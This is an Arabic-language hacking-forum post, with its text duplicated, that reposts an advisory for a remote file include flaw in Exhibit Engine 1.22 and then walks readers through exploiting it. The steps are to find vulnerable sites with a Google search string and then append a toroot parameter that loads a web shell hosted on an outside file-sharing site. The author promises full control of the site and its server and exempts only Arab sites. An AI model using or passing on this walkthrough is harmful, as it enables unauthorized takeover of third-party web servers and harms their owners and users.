al3ndleeb
06-28-2006, 04:05 PM
مرحبا احباء اول شرح ليا اليوم اختراق المواقع عن طريق ثغره Exhibit Engine موجوده في اكبر
المواقع واضخمها الصغره تعتمد اساسا على الشيل اي بمعنى انه نرفع شيل على الموقع وعن طريق
الشل نخترق الموقع كله مع السرفر اللي محجوز عليه الموقع واهم شي يرجى عدم استخدام الثغره
في المواقع العربيه انا بلغة اللهم فشهد الان مع الشرح :
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ Exhibit Engine <= 1.22 (toroot) Remote File Include Vulnerability
$$ Script site: http://photography-on-the.net/ee/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
#Pozdro dla wszystkich ;-)
هذه الثغره طبعا في ناس راح يسئلوا العندليب كيف يا عندليب بدنا نستخدم الثغره او بمعنى تاني
كيف استغلال الثغره واكيد العندليب بيساعدكم على استغلال الثغره .
اول نروح لحبيبنا وحبيب الهكر جوجل www.googel.com
ثانيا : نكتب في البحث كلمة ( Powered by Exhibit Engine )
طبعا ماشاء الله حبيبنا جوجل ما راح يقصر معنا راح يعطينا الالف المواقع اللي فيها الثغره وهم شي
عدم الاقتراب على المواقع العربيه لنها كمان مصابه فيها ,
تختار احد المواقع واللي بيكون على شكل هذا :
www.******.com/gallery
نضيف عليه هذا الكود :
styles.php?toroot=http://www.kuwaitup.net/uploads/46b95a5f01.gif?cmd
سوف يصبح الكود بعد التعديل هكذا :
www.*******.com/gallery/styles.php?toroot=http://www.kuwaitup.net/uplo ads/46b95a5f01.gif?cmd
واخير بعد ان تقوموا بعمل الشرح كما هوا دون اي نقصان سوف يعمل معاكم الشيل ويصبح الموقع
والسرفر ملك خاص فيكم واي سؤال انا حاضر تحياتي للجمع
المواقع واضخمها الصغره تعتمد اساسا على الشيل اي بمعنى انه نرفع شيل على الموقع وعن طريق
الشل نخترق الموقع كله مع السرفر اللي محجوز عليه الموقع واهم شي يرجى عدم استخدام الثغره
في المواقع العربيه انا بلغة اللهم فشهد الان مع الشرح :
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ Exhibit Engine <= 1.22 (toroot) Remote File Include Vulnerability
$$ Script site: http://photography-on-the.net/ee/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
#Pozdro dla wszystkich ;-)
هذه الثغره طبعا في ناس راح يسئلوا العندليب كيف يا عندليب بدنا نستخدم الثغره او بمعنى تاني
كيف استغلال الثغره واكيد العندليب بيساعدكم على استغلال الثغره .
اول نروح لحبيبنا وحبيب الهكر جوجل www.googel.com
ثانيا : نكتب في البحث كلمة ( Powered by Exhibit Engine )
طبعا ماشاء الله حبيبنا جوجل ما راح يقصر معنا راح يعطينا الالف المواقع اللي فيها الثغره وهم شي
عدم الاقتراب على المواقع العربيه لنها كمان مصابه فيها ,
تختار احد المواقع واللي بيكون على شكل هذا :
www.******.com/gallery
نضيف عليه هذا الكود :
styles.php?toroot=http://www.kuwaitup.net/uploads/46b95a5f01.gif?cmd
سوف يصبح الكود بعد التعديل هكذا :
www.*******.com/gallery/styles.php?toroot=http://www.kuwaitup.net/uplo ads/46b95a5f01.gif?cmd
واخير بعد ان تقوموا بعمل الشرح كما هوا دون اي نقصان سوف يعمل معاكم الشيل ويصبح الموقع
والسرفر ملك خاص فيكم واي سؤال انا حاضر تحياتي للجمع